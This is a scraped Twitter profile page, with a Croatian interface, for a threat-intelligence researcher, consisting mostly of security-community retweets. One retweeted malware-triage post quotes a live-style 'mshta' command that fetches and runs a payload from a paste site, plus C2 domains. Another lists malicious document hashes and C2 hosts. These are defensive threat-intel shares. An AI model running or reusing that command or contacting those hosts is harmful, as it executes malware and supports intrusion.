Casey Brooks

@DrunkBinary

Senior Adversary Hunter , Army Veteran, Cocktail Scientist, APT Researcher | Opinions are my own and not the views of my employer.

Neverwhere
Vrijeme pridruživanja: listopad 2015.

Tweetovi

Blokirali ste korisnika/cu @DrunkBinary

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @DrunkBinary

  1. Prikvačeni tweet
    16. stu 2018.
    Poništi
  2. proslijedio/la je Tweet
    prije 3 sata

    Senior Adversary Hunter from talking to customers about the current threat landscape affecting OnG environments with no fluff or BS

    Poništi
  3. proslijedio/la je Tweet
    prije 7 sati

    2020-02-05: [Breaking]🔥🆕 "🇷🇺Pro-Russian CyberSpy Intensifies Ukrainian 🇺🇦 Security Targeting" 🔦The 'Fifth Domain': Gamaredon Wages Silent War with Ukranian Military & Law Enforcement ➡️5k Victim Scope in Ukraine Along 'Separation Line'

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet

    Coming soon to Sysmon: clipboard logging for malicious RDP session DFIR, and shredded file recovery for capturing hacking tools

    Poništi
  5. proslijedio/la je Tweet
    prije 20 sati
    Poništi
  6. prije 17 sati

    Got my EICAR QR Code Velcro patch from

    Poništi
  7. proslijedio/la je Tweet
    3. velj

    w00t the paper I wrote to accompany my presentation is now available! Find it here (and note the "Skip" button below the contact form to get right to the paper):

    Poništi
  8. proslijedio/la je Tweet

    To the person who figured out my honeypot is a honeypot could you please stop putting the picture of Pooh bear with a jar of honey on it? Its like this person's life mission, I've blocked him on: - Client - IPs (now on Tor ffs) - The image (he just edits 1 pixel every time...)

    Prikaži ovu nit
    Poništi
  9. 3. velj
    Poništi
  10. 2. velj

    Interested in learning more about Telecommunication Security? Check out

    Poništi
  11. proslijedio/la je Tweet
    1. velj

    My team is reading this book, and some are highlighting portions that I would debate. For example, page 81 discusses "offensive methods" that "become public and disappear." That may be the view of a top tier foreign intelligence organization, but is largely not true for others.

    Prikaži ovu nit
    Poništi
  12. proslijedio/la je Tweet
    27. sij

    doc - a4b6abdbcdceab1ad5cf6784600aca34 dot - dd1033f4fa3fc8ba0fde4eb457a4fe6f C2: kastoget.hopto[.]org papir.hopto[.]org

    Poništi
  13. 1. velj

    No, bad tweet, bad tweet, get back in your hole...

    Tweet je nedostupan.
    Poništi
  14. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    30. sij

    I've spent a whole day on Sigma Focus: Facilitate contributions - New Rule Creation Guide - New colorised test output - New test cases - Rule cleanup (title, date, ids) Next step: How-to guide for pull requests

    Poništi
  16. proslijedio/la je Tweet
    31. sij

    This is how communicates with the team.

    Poništi
  17. proslijedio/la je Tweet
    31. sij

    Epic Angry Rant! Ripping Blizzard Activision for their awful Warcraft 3 Reforged Debacle & Terrible Response! The passion is gone! Disgraceful. You Done F&@KED IT UP! RT Plz! 1st Gaming Epic Fail of 2020!

    Poništi
  18. proslijedio/la je Tweet

    As I’m still in recovery from my battle with cancer I will not be attending this year. Working to be good for joining Blackhat/DEFCON! However my awesome colleagues are at . Come talk with them about our data and platforms 🙃. You can find them at booth #4429.

    Poništi
  19. proslijedio/la je Tweet
    30. sij

    At the SANS , will highlight 3 case studies that prove understanding the process environment & identifying critical path nodes for the defended facility is vital to ensure appropriate defense where it matters most | Mar 2-3 | Agenda:

    Poništi
  20. proslijedio/la je Tweet
    29. sij

    So this just happened: First (real) blog at the new job.

    Poništi
  21. proslijedio/la je Tweet
    29. sij

    🇮🇷 has also used tracking pixels. It isn't a novel technique of course, but it is observed in the wild in targeted threat activity. Even beyond email, communication clients are notorious for leaking information. It's not a bad idea to rigorously test how they behave.

    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·